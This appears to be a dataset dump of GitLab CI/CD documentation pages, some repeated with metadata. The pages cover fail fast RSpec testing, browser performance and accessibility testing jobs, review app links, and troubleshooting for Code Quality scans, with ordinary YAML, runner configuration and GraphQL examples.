revisions, select the filename. 1. On the file's page, select **View on [environment-name]** ({{< icon name="external-link" >}}) in the upper-right corner. To view mapped pages from a commit: 1. Go to a commit that has a review app deployment: - For branch pipelines: Select **Code > Commits** and select a commit with a pipeline badge. - For merge request pipelines: In your merge request, select the **Commits** tab and select a commit. - For merged results pipelines: In your merge request, select the **Pipelines** tab and select the pipeline commit. 1. Select the review app icon ({{< icon name="external-link" >}}) next to a filename that matches your route map. The icon opens the corresponding page in your review app. {{< alert type="note" >}} Merged results pipelines create an internal commit that merges your branch with the target branch. To access review app links for these pipelines, use the commit from the **Pipelines** tab, not the **Commits** tab. {{< /alert >}}
https://docs.gitlab.com/ci/fail_fast_testing
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/fail_fast_testing.md
2025-08-13
doc/ci/testing
[ "doc", "ci", "testing" ]
fail_fast_testing.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Fail Fast Testing
null
{{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} For applications that use RSpec for running tests, we've introduced the `Verify/Failfast` [template to run subsets of your test suite](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates/Verify/FailFast.gitlab-ci.yml), based on the changes in your merge request. The template uses the [`test_file_finder` (`tff`) gem](https://gitlab.com/gitlab-org/ruby/gems/test_file_finder) that accepts a list of files as input, and returns a list of spec (test) files that it believes to be relevant to the input files. `tff` is designed for Ruby on Rails projects, so the `Verify/FailFast` template is configured to run when changes to Ruby files are detected. By default, it runs in the [`.pre` stage](../yaml/_index.md#stage-pre) of a GitLab CI/CD pipeline, before all other stages. ## Example use case Fail fast testing is useful when adding new functionality to a project and adding new automated tests. Your project could have hundreds of thousands of tests that take a long time to complete. You may expect a new test to pass, but you have to wait for all the tests to complete to verify it. This could take an hour or more, even when using parallelization. Fail fast testing gives you a faster feedback loop from the pipeline. It lets you know quickly that the new tests are passing and the new functionality did not break other tests. ## Prerequisites This template requires: - A project built in Rails that uses RSpec for testing. - CI/CD configured to: - Use a Docker image with Ruby available. - Use [Merge request pipelines](../pipelines/merge_request_pipelines.md#prerequisites) - [Merged results pipelines](../pipelines/merged_results_pipelines.md#enable-merged-results-pipelines) enabled in the project settings. - A Docker image with Ruby available. The template uses `image: ruby:2.6` by default, but you [can override](../yaml/includes.md#override-included-configuration-values) this. ## Configuring Fast RSpec Failure We use the following plain RSpec configuration as a starting point. It installs all the project gems and executes `rspec`, on merge request pipelines only. ```yaml rspec-complete: stage: test rules: - if: $CI_PIPELINE_SOURCE == "merge_request_event" script: - bundle install - bundle exec rspec ``` To run the most relevant specs first instead of the whole suite, [`include`](../yaml/_index.md#include) the template by adding the following to your CI/CD configuration: ```yaml include: - template: Verify/FailFast.gitlab-ci.yml ``` To customize the job, specific options may be set to override the template. For example, to override the default Docker image: ```yaml include: - template: Verify/FailFast.gitlab-ci.yml rspec-rails-modified-path-specs: image: custom-docker-image-with-ruby ``` ### Example test loads For illustrative purposes, our Rails app spec suite consists of 100 specs per model for ten models. If no Ruby files are changed: - `rspec-rails-modified-paths-specs` does not run any tests. - `rspec-complete` runs the full suite of 1000 tests. If one Ruby model is changed, for example `app/models/example.rb`, then `rspec-rails-modified-paths-specs` runs the 100 tests for `example.rb`: - If all of these 100 tests pass, then the full `rspec-complete` suite of 1000 tests is allowed to run. - If any of these 100 tests fail, they fail quickly, and `rspec-complete` does not run any tests. The final case saves resources and time as the full 1000 test suite does not run.
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Fail Fast Testing breadcrumbs: - doc - ci - testing --- {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} For applications that use RSpec for running tests, we've introduced the `Verify/Failfast` [template to run subsets of your test suite](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates/Verify/FailFast.gitlab-ci.yml), based on the changes in your merge request. The template uses the [`test_file_finder` (`tff`) gem](https://gitlab.com/gitlab-org/ruby/gems/test_file_finder) that accepts a list of files as input, and returns a list of spec (test) files that it believes to be relevant to the input files. `tff` is designed for Ruby on Rails projects, so the `Verify/FailFast` template is configured to run when changes to Ruby files are detected. By default, it runs in the [`.pre` stage](../yaml/_index.md#stage-pre) of a GitLab CI/CD pipeline, before all other stages. ## Example use case Fail fast testing is useful when adding new functionality to a project and adding new automated tests. Your project could have hundreds of thousands of tests that take a long time to complete. You may expect a new test to pass, but you have to wait for all the tests to complete to verify it. This could take an hour or more, even when using parallelization. Fail fast testing gives you a faster feedback loop from the pipeline. It lets you know quickly that the new tests are passing and the new functionality did not break other tests. ## Prerequisites This template requires: - A project built in Rails that uses RSpec for testing. - CI/CD configured to: - Use a Docker image with Ruby available. - Use [Merge request pipelines](../pipelines/merge_request_pipelines.md#prerequisites) - [Merged results pipelines](../pipelines/merged_results_pipelines.md#enable-merged-results-pipelines) enabled in the project settings. - A Docker image with Ruby available. The template uses `image: ruby:2.6` by default, but you [can override](../yaml/includes.md#override-included-configuration-values) this. ## Configuring Fast RSpec Failure We use the following plain RSpec configuration as a starting point. It installs all the project gems and executes `rspec`, on merge request pipelines only. ```yaml rspec-complete: stage: test rules: - if: $CI_PIPELINE_SOURCE == "merge_request_event" script: - bundle install - bundle exec rspec ``` To run the most relevant specs first instead of the whole suite, [`include`](../yaml/_index.md#include) the template by adding the following to your CI/CD configuration: ```yaml include: - template: Verify/FailFast.gitlab-ci.yml ``` To customize the job, specific options may be set to override the template. For example, to override the default Docker image: ```yaml include: - template: Verify/FailFast.gitlab-ci.yml rspec-rails-modified-path-specs: image: custom-docker-image-with-ruby ``` ### Example test loads For illustrative purposes, our Rails app spec suite consists of 100 specs per model for ten models. If no Ruby files are changed: - `rspec-rails-modified-paths-specs` does not run any tests. - `rspec-complete` runs the full suite of 1000 tests. If one Ruby model is changed, for example `app/models/example.rb`, then `rspec-rails-modified-paths-specs` runs the 100 tests for `example.rb`: - If all of these 100 tests pass, then the full `rspec-complete` suite of 1000 tests is allowed to run. - If any of these 100 tests fail, they fail quickly, and `rspec-complete` does not run any tests. The final case saves resources and time as the full 1000 test suite does not run.
https://docs.gitlab.com/ci/browser_performance_testing
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/browser_performance_testing.md
2025-08-13
doc/ci/testing
[ "doc", "ci", "testing" ]
browser_performance_testing.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Browser Performance Testing
null
{{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} If your application offers a web interface and you're using [GitLab CI/CD](../_index.md), you can quickly determine the rendering performance impact of pending code changes in the browser. {{< alert type="note" >}} You can automate this feature in your applications by using [Auto DevOps](../../topics/autodevops/_index.md). {{< /alert >}} GitLab uses [Sitespeed.io](https://www.sitespeed.io), a free and open source tool, for measuring the rendering performance of web sites. The [Sitespeed plugin](https://gitlab.com/gitlab-org/gl-performance) that GitLab built outputs the performance score for each page analyzed in a file called `browser-performance.json` this data can be shown on merge requests. ## Use cases Consider the following workflow: 1. A member of the marketing team is attempting to track engagement by adding a new tool. 1. With browser performance metrics, they see how their changes are impacting the usability of the page for end users. 1. The metrics show that after their changes, the performance score of the page has gone down. 1. When looking at the detailed report, they see the new JavaScript library was included in `<head>`, which affects loading page speed. 1. They ask for help from a front end developer, who sets the library to load asynchronously. 1. The frontend developer approves the merge request, and authorizes its deployment to production. ## How browser performance testing works First, define a job in your `.gitlab-ci.yml` file that generates the [Browser Performance report artifact](../yaml/artifacts_reports.md#artifactsreportsbrowser_performance). GitLab then checks this report, compares key performance metrics for each page between the source and target branches, and shows the information in the merge request. For an example Browser Performance job, see [Configuring Browser Performance Testing](#configuring-browser-performance-testing). {{< alert type="note" >}} If the Browser Performance report has no data to compare, such as when you add the Browser Performance job in your `.gitlab-ci.yml` for the very first time, the Browser Performance report widget doesn't display. It must have run at least once on the target branch (`main`, for example), before it displays in a merge request targeting that branch. Additionally, the widget only displays if the job ran in the latest pipeline for the Merge request. {{< /alert >}} ![Browser Performance Widget](img/browser_performance_testing_v13_4.png) ## Configuring Browser Performance Testing {{< history >}} - Support for the `SITESPEED_DOCKER_OPTIONS` variable [introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/134024) in GitLab 16.6. {{< /history >}} This example shows how to run the [sitespeed.io container](https://hub.docker.com/r/sitespeedio/sitespeed.io/) on your code by using GitLab CI/CD and [sitespeed.io](https://www.sitespeed.io) using Docker-in-Docker. 1. First, set up GitLab Runner with a [Docker-in-Docker build](../docker/using_docker_build.md#use-docker-in-docker). 1. Configure the default Browser Performance Testing CI/CD job as follows in your `.gitlab-ci.yml` file: ```yaml include: template: Verify/Browser-Performance.gitlab-ci.yml browser_performance: variables: URL: https://example.com ``` The previous example: - Creates a `browser_performance` job in your CI/CD pipeline and runs sitespeed.io against the webpage you defined in `URL` to gather key metrics. - Uses a template that doesn't work with Kubernetes clusters. If you are using a Kubernetes cluster, use [`template: Jobs/Browser-Performance-Testing.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Browser-Performance-Testing.gitlab-ci.yml) instead. The template uses the [GitLab plugin for sitespeed.io](https://gitlab.com/gitlab-org/gl-performance), and it saves the full HTML sitespeed.io report as a [Browser Performance report artifact](../yaml/artifacts_reports.md#artifactsreportsbrowser_performance) that you can later download and analyze. This implementation always takes the latest Browser Performance artifact available. If [GitLab Pages](../../user/project/pages/_index.md) is enabled, you can view the report directly in your browser. You can also customize the jobs with CI/CD variables: - `SITESPEED_IMAGE`: Configure the Docker image to use for the job (default `sitespeedio/sitespeed.io`), but not the image version. - `SITESPEED_VERSION`: Configure the version of the Docker image to use for the job (default `14.1.0`). - `SITESPEED_OPTIONS`: Configure any additional sitespeed.io options as required (default `nil`). Refer to the [sitespeed.io documentation](https://www.sitespeed.io/documentation/sitespeed.io/configuration/) for more details. - `SITESPEED_DOCKER_OPTIONS`: Configure any additional Docker options (default `nil`). Refer to the [Docker options documentation](https://docs.docker.com/reference/cli/docker/container/run/#options) for more details. For example, you can override the number of runs sitespeed.io makes on the given URL, and change the version: ```yaml include: template: Verify/Browser-Performance.gitlab-ci.yml browser_performance: variables: URL: https://www.sitespeed.io/ SITESPEED_VERSION: 13.2.0 SITESPEED_OPTIONS: -n 5 ``` ### Configuring degradation threshold You can configure the sensitivity of degradation alerts to avoid getting alerts for minor drops in metrics. This is done by setting the `DEGRADATION_THRESHOLD` CI/CD variable. In the following example, the alert only shows up if the `Total Score` metric degrades by 5 points or more: ```yaml include: template: Verify/Browser-Performance.gitlab-ci.yml browser_performance: variables: URL: https://example.com DEGRADATION_THRESHOLD: 5 ``` The `Total Score` metric is based on sitespeed.io's [coach performance score](https://www.sitespeed.io/documentation/sitespeed.io/metrics/#performance-score). There is more information in [the coach documentation](https://www.sitespeed.io/documentation/coach/how-to/#what-do-the-coach-do). ### Performance testing on review apps The previous CI YAML configuration is great for testing against static environments, and it can be extended for dynamic environments, but a few extra steps are required: 1. The `browser_performance` job should run after the dynamic environment has started. 1. In the `review` job: 1. Generate a URL list file with the dynamic URL. 1. Save the file as an artifact, for example with `echo $CI_ENVIRONMENT_URL > environment_url.txt` in your job's `script`. 1. Pass the list as the URL environment variable (which can be a URL or a file containing URLs) to the `browser_performance` job. 1. You can now run the sitespeed.io container against the desired hostname and paths. Your `.gitlab-ci.yml` file would look like: ```yaml stages: - deploy - performance include: template: Verify/Browser-Performance.gitlab-ci.yml review: stage: deploy environment: name: review/$CI_COMMIT_REF_SLUG url: http://$CI_COMMIT_REF_SLUG.$APPS_DOMAIN script: - run_deploy_script - echo $CI_ENVIRONMENT_URL > environment_url.txt artifacts: paths: - environment_url.txt rules: - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH when: never - if: $CI_COMMIT_BRANCH browser_performance: dependencies: - review variables: URL: environment_url.txt ```
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Browser Performance Testing breadcrumbs: - doc - ci - testing --- {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} If your application offers a web interface and you're using [GitLab CI/CD](../_index.md), you can quickly determine the rendering performance impact of pending code changes in the browser. {{< alert type="note" >}} You can automate this feature in your applications by using [Auto DevOps](../../topics/autodevops/_index.md). {{< /alert >}} GitLab uses [Sitespeed.io](https://www.sitespeed.io), a free and open source tool, for measuring the rendering performance of web sites. The [Sitespeed plugin](https://gitlab.com/gitlab-org/gl-performance) that GitLab built outputs the performance score for each page analyzed in a file called `browser-performance.json` this data can be shown on merge requests. ## Use cases Consider the following workflow: 1. A member of the marketing team is attempting to track engagement by adding a new tool. 1. With browser performance metrics, they see how their changes are impacting the usability of the page for end users. 1. The metrics show that after their changes, the performance score of the page has gone down. 1. When looking at the detailed report, they see the new JavaScript library was included in `<head>`, which affects loading page speed. 1. They ask for help from a front end developer, who sets the library to load asynchronously. 1. The frontend developer approves the merge request, and authorizes its deployment to production. ## How browser performance testing works First, define a job in your `.gitlab-ci.yml` file that generates the [Browser Performance report artifact](../yaml/artifacts_reports.md#artifactsreportsbrowser_performance). GitLab then checks this report, compares key performance metrics for each page between the source and target branches, and shows the information in the merge request. For an example Browser Performance job, see [Configuring Browser Performance Testing](#configuring-browser-performance-testing). {{< alert type="note" >}} If the Browser Performance report has no data to compare, such as when you add the Browser Performance job in your `.gitlab-ci.yml` for the very first time, the Browser Performance report widget doesn't display. It must have run at least once on the target branch (`main`, for example), before it displays in a merge request targeting that branch. Additionally, the widget only displays if the job ran in the latest pipeline for the Merge request. {{< /alert >}} ![Browser Performance Widget](img/browser_performance_testing_v13_4.png) ## Configuring Browser Performance Testing {{< history >}} - Support for the `SITESPEED_DOCKER_OPTIONS` variable [introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/134024) in GitLab 16.6. {{< /history >}} This example shows how to run the [sitespeed.io container](https://hub.docker.com/r/sitespeedio/sitespeed.io/) on your code by using GitLab CI/CD and [sitespeed.io](https://www.sitespeed.io) using Docker-in-Docker. 1. First, set up GitLab Runner with a [Docker-in-Docker build](../docker/using_docker_build.md#use-docker-in-docker). 1. Configure the default Browser Performance Testing CI/CD job as follows in your `.gitlab-ci.yml` file: ```yaml include: template: Verify/Browser-Performance.gitlab-ci.yml browser_performance: variables: URL: https://example.com ``` The previous example: - Creates a `browser_performance` job in your CI/CD pipeline and runs sitespeed.io against the webpage you defined in `URL` to gather key metrics. - Uses a template that doesn't work with Kubernetes clusters. If you are using a Kubernetes cluster, use [`template: Jobs/Browser-Performance-Testing.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Browser-Performance-Testing.gitlab-ci.yml) instead. The template uses the [GitLab plugin for sitespeed.io](https://gitlab.com/gitlab-org/gl-performance), and it saves the full HTML sitespeed.io report as a [Browser Performance report artifact](../yaml/artifacts_reports.md#artifactsreportsbrowser_performance) that you can later download and analyze. This implementation always takes the latest Browser Performance artifact available. If [GitLab Pages](../../user/project/pages/_index.md) is enabled, you can view the report directly in your browser. You can also customize the jobs with CI/CD variables: - `SITESPEED_IMAGE`: Configure the Docker image to use for the job (default `sitespeedio/sitespeed.io`), but not the image version. - `SITESPEED_VERSION`: Configure the version of the Docker image to use for the job (default `14.1.0`). - `SITESPEED_OPTIONS`: Configure any additional sitespeed.io options as required (default `nil`). Refer to the [sitespeed.io documentation](https://www.sitespeed.io/documentation/sitespeed.io/configuration/) for more details. - `SITESPEED_DOCKER_OPTIONS`: Configure any additional Docker options (default `nil`). Refer to the [Docker options documentation](https://docs.docker.com/reference/cli/docker/container/run/#options) for more details. For example, you can override the number of runs sitespeed.io makes on the given URL, and change the version: ```yaml include: template: Verify/Browser-Performance.gitlab-ci.yml browser_performance: variables: URL: https://www.sitespeed.io/ SITESPEED_VERSION: 13.2.0 SITESPEED_OPTIONS: -n 5 ``` ### Configuring degradation threshold You can configure the sensitivity of degradation alerts to avoid getting alerts for minor drops in metrics. This is done by setting the `DEGRADATION_THRESHOLD` CI/CD variable. In the following example, the alert only shows up if the `Total Score` metric degrades by 5 points or more: ```yaml include: template: Verify/Browser-Performance.gitlab-ci.yml browser_performance: variables: URL: https://example.com DEGRADATION_THRESHOLD: 5 ``` The `Total Score` metric is based on sitespeed.io's [coach performance score](https://www.sitespeed.io/documentation/sitespeed.io/metrics/#performance-score). There is more information in [the coach documentation](https://www.sitespeed.io/documentation/coach/how-to/#what-do-the-coach-do). ### Performance testing on review apps The previous CI YAML configuration is great for testing against static environments, and it can be extended for dynamic environments, but a few extra steps are required: 1. The `browser_performance` job should run after the dynamic environment has started. 1. In the `review` job: 1. Generate a URL list file with the dynamic URL. 1. Save the file as an artifact, for example with `echo $CI_ENVIRONMENT_URL > environment_url.txt` in your job's `script`. 1. Pass the list as the URL environment variable (which can be a URL or a file containing URLs) to the `browser_performance` job. 1. You can now run the sitespeed.io container against the desired hostname and paths. Your `.gitlab-ci.yml` file would look like: ```yaml stages: - deploy - performance include: template: Verify/Browser-Performance.gitlab-ci.yml review: stage: deploy environment: name: review/$CI_COMMIT_REF_SLUG url: http://$CI_COMMIT_REF_SLUG.$APPS_DOMAIN script: - run_deploy_script - echo $CI_ENVIRONMENT_URL > environment_url.txt artifacts: paths: - environment_url.txt rules: - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH when: never - if: $CI_COMMIT_BRANCH browser_performance: dependencies: - review variables: URL: environment_url.txt ```
https://docs.gitlab.com/ci/accessibility_testing
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/accessibility_testing.md
2025-08-13
doc/ci/testing
[ "doc", "ci", "testing" ]
accessibility_testing.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Accessibility testing
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} If your application offers a web interface, you can use [GitLab CI/CD](../_index.md) to determine the accessibility impact of pending code changes. [Pa11y](https://pa11y.org/) is a free and open source tool for measuring the accessibility of web sites. GitLab integrates Pa11y into a [CI/CD job template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Verify/Accessibility.gitlab-ci.yml). The `a11y` job analyzes a defined set of web pages and reports accessibility violations, warnings, and notices in a file named `accessibility`. Pa11y uses [WCAG 2.1 rules](https://www.w3.org/TR/WCAG21/#new-features-in-wcag-2-1). ## Accessibility merge request widget GitLab displays an **Accessibility Report** in the merge request widget area: ![Accessibility merge request widget](img/accessibility_mr_widget_v13_0.png) ## Configure accessibility testing You can run Pa11y with GitLab CI/CD using the [GitLab Accessibility Docker image](https://gitlab.com/gitlab-org/ci-cd/accessibility). To define the `a11y` job: 1. [Include](../yaml/_index.md#includetemplate) the [`Accessibility.gitlab-ci.yml` template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Verify/Accessibility.gitlab-ci.yml) from your GitLab installation. 1. Add the following configuration to your `.gitlab-ci.yml` file. ```yaml stages: - accessibility variables: a11y_urls: "https://about.gitlab.com https://gitlab.com/users/sign_in" include: - template: "Verify/Accessibility.gitlab-ci.yml" ``` 1. Customize the `a11y_urls` variable to list the URLs of the web pages to test with Pa11y. The `a11y` job in your CI/CD pipeline generates these files: - One HTML report per URL listed in the `a11y_urls` variable. - One file containing the collected report data. This file is named `gl-accessibility.json`. You can [view job artifacts in your browser](../jobs/job_artifacts.md#download-job-artifacts). {{< alert type="note" >}} The job definition provided by the template does not support Kubernetes. {{< /alert >}} You cannot pass configurations into Pa11y via CI configuration. To change the configuration, edit a copy of the template in your CI file.
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Accessibility testing breadcrumbs: - doc - ci - testing --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} If your application offers a web interface, you can use [GitLab CI/CD](../_index.md) to determine the accessibility impact of pending code changes. [Pa11y](https://pa11y.org/) is a free and open source tool for measuring the accessibility of web sites. GitLab integrates Pa11y into a [CI/CD job template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Verify/Accessibility.gitlab-ci.yml). The `a11y` job analyzes a defined set of web pages and reports accessibility violations, warnings, and notices in a file named `accessibility`. Pa11y uses [WCAG 2.1 rules](https://www.w3.org/TR/WCAG21/#new-features-in-wcag-2-1). ## Accessibility merge request widget GitLab displays an **Accessibility Report** in the merge request widget area: ![Accessibility merge request widget](img/accessibility_mr_widget_v13_0.png) ## Configure accessibility testing You can run Pa11y with GitLab CI/CD using the [GitLab Accessibility Docker image](https://gitlab.com/gitlab-org/ci-cd/accessibility). To define the `a11y` job: 1. [Include](../yaml/_index.md#includetemplate) the [`Accessibility.gitlab-ci.yml` template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Verify/Accessibility.gitlab-ci.yml) from your GitLab installation. 1. Add the following configuration to your `.gitlab-ci.yml` file. ```yaml stages: - accessibility variables: a11y_urls: "https://about.gitlab.com https://gitlab.com/users/sign_in" include: - template: "Verify/Accessibility.gitlab-ci.yml" ``` 1. Customize the `a11y_urls` variable to list the URLs of the web pages to test with Pa11y. The `a11y` job in your CI/CD pipeline generates these files: - One HTML report per URL listed in the `a11y_urls` variable. - One file containing the collected report data. This file is named `gl-accessibility.json`. You can [view job artifacts in your browser](../jobs/job_artifacts.md#download-job-artifacts). {{< alert type="note" >}} The job definition provided by the template does not support Kubernetes. {{< /alert >}} You cannot pass configurations into Pa11y via CI configuration. To change the configuration, edit a copy of the template in your CI file.
https://docs.gitlab.com/ci/code_quality_troubleshooting
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/code_quality_troubleshooting.md
2025-08-13
doc/ci/testing
[ "doc", "ci", "testing" ]
code_quality_troubleshooting.md
Application Security Testing
Static Analysis
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Troubleshooting Code Quality
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} When working with Code Quality, you might encounter the following issues. ## The code cannot be found and the pipeline runs always with default configuration You are probably using a private runner with the Docker-in-Docker socket-binding configuration. You should configure Code Quality checks to run on your worker as documented in [Use private runners](code_quality_codeclimate_scanning.md#use-private-runners). ## Changing the default configuration has no effect A common issue is that the terms `Code Quality` (GitLab specific) and `Code Climate` (Engine used by GitLab) are very similar. You must add a **`.codeclimate.yml`** file to change the default configuration, **not** a `.codequality.yml` file. If you use the wrong filename, the [default `.codeclimate.yml`](https://gitlab.com/gitlab-org/ci-cd/codequality/-/blob/master/codeclimate_defaults/.codeclimate.yml.template) is still used. ## No Code Quality report is displayed in a merge request Code Quality reports from the source or target branch may be missing for comparison on the merge request, so no information can be displayed. Missing report on the source branch can be due to: 1. Use of the [`REPORT_STDOUT` environment variable](https://gitlab.com/gitlab-org/ci-cd/codequality#environment-variables), no report file is generated and nothing displays in the merge request. Missing report on the target branch can be due to: - Newly added Code Quality job in your `.gitlab-ci.yml`. - Your pipeline is not set to run the Code Quality job on your target branch. - Commits are made to the default branch that do not run the Code Quality job. - The [`artifacts:expire_in`](../yaml/_index.md#artifactsexpire_in) CI/CD setting can cause the Code Quality artifacts to expire faster than desired. Verify the presence of report on the base commit by obtaining the `base_sha` using the [merge request API](../../api/merge_requests.md#get-single-mr) and use the [pipelines API with the `sha` attribute](../../api/pipelines.md#list-project-pipelines) to check if pipelines ran. ## No Code Quality symbol in the changes view If no symbol is displayed in the [changes view](code_quality.md#merge-request-changes-view), ensure that the `location.path` in the code quality report: - Is using a relative path to the file containing the code quality violation. - Is not prefixed with `./`. For example, the `path` should be `somedir/file1.rb` instead of `./somedir/file1.rb`. ## Only a single Code Quality report is displayed, but more are defined Code Quality automatically [combines multiple reports](code_quality.md#scan-code-for-quality-violations). In GitLab 15.6 and earlier, Code Quality used only the artifact from the latest created job (with the largest job ID). Code Quality artifacts from earlier jobs were ignored. ## RuboCop errors When using Code Quality jobs on a Ruby project, you can encounter problems running RuboCop. For example, the following error can appear when using either a very recent or very old version of Ruby: ```plaintext /usr/local/bundle/gems/rubocop-0.52.1/lib/rubocop/config.rb:510:in `check_target_ruby': Unknown Ruby version 2.7 found in `.ruby-version`. (RuboCop::ValidationError) Supported versions: 2.1, 2.2, 2.3, 2.4, 2.5 ``` This is caused by the default version of RuboCop used by the check engine not covering support for the Ruby version in use. To use a custom version of RuboCop that [supports the version of Ruby used by the project](https://docs.rubocop.org/rubocop/compatibility.html#support-matrix), you can [override the configuration through a `.codeclimate.yml` file](https://docs.codeclimate.com/docs/rubocop#using-rubocops-newer-versions) created in the project repository. For example, to specify using RuboCop release **0.67**: ```yaml version: "2" plugins: rubocop: enabled: true channel: rubocop-0-67 ``` ## No Code Quality appears on merge requests when using custom tool If your merge requests do not show any Code Quality changes when using a custom tool, ensure that *all* line properties in the JSON are `integer`. ## Error: `Could not analyze code quality` You might get the error: ```shell error: (CC::CLI::Analyze::EngineFailure) engine pmd ran for 900 seconds and was killed Could not analyze code quality for the repository at /code ``` If you enabled any of the Code Climate plugins, and the Code Quality CI/CD job fails with this error message, it's likely the job takes longer than the default timeout of 900 seconds: To work around this problem, set `TIMEOUT_SECONDS` to a higher value in your `.gitlab-ci.yml` file. For example: ```yaml code_quality: variables: TIMEOUT_SECONDS: 3600 ``` ## Using Code Quality with a Kubernetes or OpenShift runner CodeClimate-based scanning has special requirements. You may need to [Configure Kubernetes or OpenShift runners for CodeClimate-based scanning](code_quality_codeclimate_scanning.md#configure-kubernetes-or-openshift-runners) before scans work properly. ## Error: `x509: certificate signed by unknown authority` If you set the `CODE_QUALITY_IMAGE` to an image that is hosted in a Docker registry which uses a TLS certificate that is not trusted, such as a self-signed certificate, you might see the following error: ```shell $ docker pull --quiet "$CODE_QUALITY_IMAGE" Error response from daemon: Get https://gitlab.example.com/v2/: x509: certificate signed by unknown authority ``` To fix this, configure the Docker daemon to [trust certificates](https://distribution.github.io/distribution/about/insecure/#use-self-signed-certificates) by putting the certificate inside of the `/etc/docker/certs.d` directory. This Docker daemon is exposed to the subsequent Code Quality Docker container in the [GitLab Code Quality template](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.8.3-ee/lib/gitlab/ci/templates/Jobs/Code-Quality.gitlab-ci.yml#L41) and should be to exposed any other containers in which you want to have your certificate configuration apply. ### Docker If you have access to GitLab Runner configuration, add the directory as a [volume mount](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section). Replace `gitlab.example.com` with the actual domain of the registry. Example: ```toml [[runners]] ... executor = "docker" [runners.docker] ... privileged = true volumes = ["/cache", "/etc/gitlab-runner/certs/gitlab.example.com.crt:/etc/docker/certs.d/gitlab.example.com/ca.crt:ro"] ``` ### Kubernetes If you have access to GitLab Runner configuration and the Kubernetes cluster, you can [mount a ConfigMap](https://docs.gitlab.com/runner/executors/kubernetes/#configmap-volume). Replace `gitlab.example.com` with the actual domain of the registry. 1. Create a ConfigMap with the certificate: ```shell kubectl create configmap registry-crt --namespace gitlab-runner --from-file /etc/gitlab-runner/certs/gitlab.example.com.crt ``` 1. Update GitLab Runner `config.toml` to specify the ConfigMap: ```toml [[runners]] ... executor = "kubernetes" [runners.kubernetes] image = "alpine:3.12" privileged = true [[runners.kubernetes.volumes.config_map]] name = "registry-crt" mount_path = "/etc/docker/certs.d/gitlab.example.com/ca.crt" sub_path = "gitlab.example.com.crt" ``` ## Failed to load Code Quality report The Code Quality report can fail to load when there are issues parsing data from the artifact file. To gain insight into the errors, you can execute a GraphQL query using the following steps: 1. Go to the pipeline details page. 1. Append `.json` to the URL. 1. Copy the `iid` of the pipeline. 1. Go to the [interactive GraphQL explorer](../../api/graphql/_index.md#interactive-graphql-explorer). 1. Run the following query: ```graphql { project(fullPath: "<fullpath-to-your-project>") { pipeline(iid: "<iid>") { codeQualityReports { count nodes { line description path fingerprint severity } pageInfo { hasNextPage hasPreviousPage startCursor endCursor } } } } } ``` ## No report artifact is created With certain Runner configurations, the Code Quality scanning job may not have access to your source code. If this happens, the `gl-code-quality-report.json` artifact won't be created. To resolve this issue, either: - Use the [documented Runner configuration for Docker-in-Docker](../docker/using_docker_build.md#use-docker-in-docker), which uses privileged mode instead of Docker socket binding. - Apply the [community workaround in issue 32027](https://gitlab.com/gitlab-org/gitlab/-/issues/32027#note_1318822628) if you wish to continue using Docker socket binding. For more details, see [Change Runner configuration](code_quality_codeclimate_scanning.md#change-runner-configuration).
